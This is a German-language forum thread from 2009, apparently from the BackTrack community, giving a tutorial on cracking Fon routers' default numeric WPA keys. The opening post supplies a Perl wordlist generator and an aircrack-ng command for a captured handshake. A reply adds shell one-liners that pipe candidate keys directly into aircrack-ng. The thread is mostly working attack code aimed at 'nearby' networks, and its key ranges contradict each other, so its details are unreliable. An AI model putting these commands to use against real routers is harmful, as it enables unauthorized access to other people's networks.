Remote Exploit Forums

Go Back   Remote Exploit Forums > International Communities > BackTrack German Community > Tutorials und Howtos


Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 10-24-2009, 02:36 PM
Reeth's Avatar
Senior Member
 
Join Date: Jun 2009
Location: /.../
Posts: 120
Send a message via ICQ to Reeth
Default Video "How to Bruteforce a nearby WPA Fon Router"

In diesem Tutroial geht es darum, wie ein Fon Router zu knacken ist, die Schwachstelle liegt hierbei an den "Standard" WPA Keys die bei der Auslieferung des Fon's gesetzt sind.

In der Praxis sind diese meistens nur Zahlen meistens mit 870250xxxxx. Im Klartext bedeutet dies, dass sich nur die letzten 5 Ziffern ändern. Ein Programm das uns genau eine Textdatei mit allen Möglichkeiten hab ich hier:

Code:
#!/usr/bin/perl
$n = 8702000000;
while ($n <= 8702555555) { system ("echo $n >> numbers.txt"); $n++; }
So, dann wird eine Textdatei erstellt, die Ihr dann mit hilfe von Aircrack und dem WPA handshake des Routers verwenden könnt.

aircrack-ng fon-01.cap -w /root/fon/numbers.txt

Das wars auch schon hoffe es hilft dem ein oder anderen irgendwie weiter.

Link zum Video

YouTube - How to Bruteforce a nearby WPA Fon Wlan [3]

mfg Reeth
__________________
„ I'd rather be hated for who I am,
than be loved for who I am not."
Reply With Quote
  #2 (permalink)  
Old 11-04-2009, 03:02 AM
cleguevara's Avatar
Member
 
Join Date: Dec 2007
Posts: 47
Default

Erstmal: Nettes Video!

Quote:
Originally Posted by Reeth View Post
Code:
#!/usr/bin/perl
$n = 8702000000;
while ($n <= 8702555555) { system ("echo $n >> numbers.txt"); $n++; }
alternativ kann man das auch ohne Umwege über Perl machen - komplett ohne Script einfach eine Zeile direkt in der Shell:
Code:
i=8702500000; while [[ $i -le 8702580000 ]] ;do i=`expr $i + 1`;echo $i >> numbers.txt; done
...performancetechnisch n bisschen schneller und man muss gar nicht erst nano auspacken ;-)

wenn mans dann auch noch ganz spartanisch ohne wordlist-textfile machen will (im Endeffekt noch effizienter) kann man den kram auch direkt an aircrack-ng pipen (dabei nicht " -" am Ende vergessen):
Code:
i=8702500000; while [[ $i -le 8702580000 ]] ;do i=`expr $i + 1`;echo $i; done | aircrack-ng fon-01.cap -w -
...just my 2 cents
__________________
OSCP

Last edited by cleguevara; 11-04-2009 at 04:06 AM.
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 02:42 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.2